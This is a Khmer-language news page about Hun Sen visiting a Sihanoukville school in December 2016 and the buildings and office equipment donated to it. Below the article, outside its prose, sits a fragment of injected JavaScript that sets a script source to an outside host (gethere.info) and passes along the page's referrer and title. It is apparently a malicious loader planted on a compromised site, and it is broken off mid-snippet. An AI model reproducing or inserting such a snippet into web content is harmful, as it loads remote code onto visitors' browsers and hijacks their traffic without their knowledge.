ព្រឹតិ្តការណ៍ថ្មីៗ

សម្តេចតេជោ ហ៊ុន សែន អញ្ជើញចុះពិនិត្យសាលាបឋមសិក្សា និងអនុវិទ្យាល័យហ៊ុនសែនឃ្លាំងលើ

2 ឆ្នាំ មុន 3 តូ សុផល

ខេត្តព្រះសីហនុ៖ នៅព្រឹកថ្ងៃទី២៤ ខែធ្នូ ឆ្នាំ២០១៦នេះ ក្នុងឱកាសអញ្ជើញមកចូលរួមក្នុងពិធីបុណ្យសមុទ្រនៅខេត្តព្រះសីហនុ សម្តេចតេជោ ហ៊ុន សែន បានឆ្លៀតអញ្ជើញចុះសួរសុខទុក្ខក្មួយៗចៅៗសិស្សានុសិស្សនៅសាលាចំនួន៧ នៅក្នុងខេត្តព្រះសីហនុ។សាលារៀនទី៥គឺ សាលាបឋមសិក្សា និងអនុវិទ្យាល័យ ហ៊ុន សែន ឃ្លាំងលើ ស្ថិតនៅភូមិ២ , សង្កាត់លេខ១ ក្រុងព្រះសីហនុ។ សម្តេចតេជោ និងសម្តេចកិត្តិ ព្រមទាំងសប្បុរសជនបានផ្តល់អគារសិក្សាដល់អនុវិទ្យាល័យគឺមាន អគារសិក្សាថ្មី ១ខ្នង កំពស់៤ជាន់មាន៤០បន្ទប់។ សម្រាប់បឋមសិក្សាគឺផ្តល់ជូនអគារសិក្សាថ្មី១ខ្នង កំពស់៣ជាន់មាន១៥បន្ទប់។ សម្រាប់បឋមសិក្សាគឺទទួលបានទីចាត់ការ១ខ្នងមាន៣បន្ទប់ ម៉ាស៊ីនកុំព្យួទ័៤គ្រឿង ម៉ាស៊ីនថតចំលង១គ្រឿង និងម៉ាស៊ីនព្រីន័រចំនួន១គ្រឿង។ចំពោះអនុវិទ្យាល័យវិញ គឺទទួលបានទីចាត់ការ១ខ្នងមាន៣បន្ទប់ ម៉ាស៊ីនកុំព្យួទ័៤គ្រឿង ម៉ាស៊ីនថតចំលង១គ្រឿង និងម៉ាស៊ីនព្រីនថឺរចំនួន១គ្រឿងដូចគ្នា។

ដើម្បីអនាគតល្អ ក្មួយៗ និងចៅៗត្រូវប្រឹងប្រែងសិក្សារៀនសូត្រ ហើយត្រូវចៀសអោយឆ្ងាយពីគ្រឿងញៀន និងអំពើអបាយមុខគ្រប់យ៉ាង។ សម្តេចតេជោ និងសម្តេចកិត្តិស្រឡាញ់ក្មួយៗ និងចៅៗគ្រប់ៗគ្នា៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ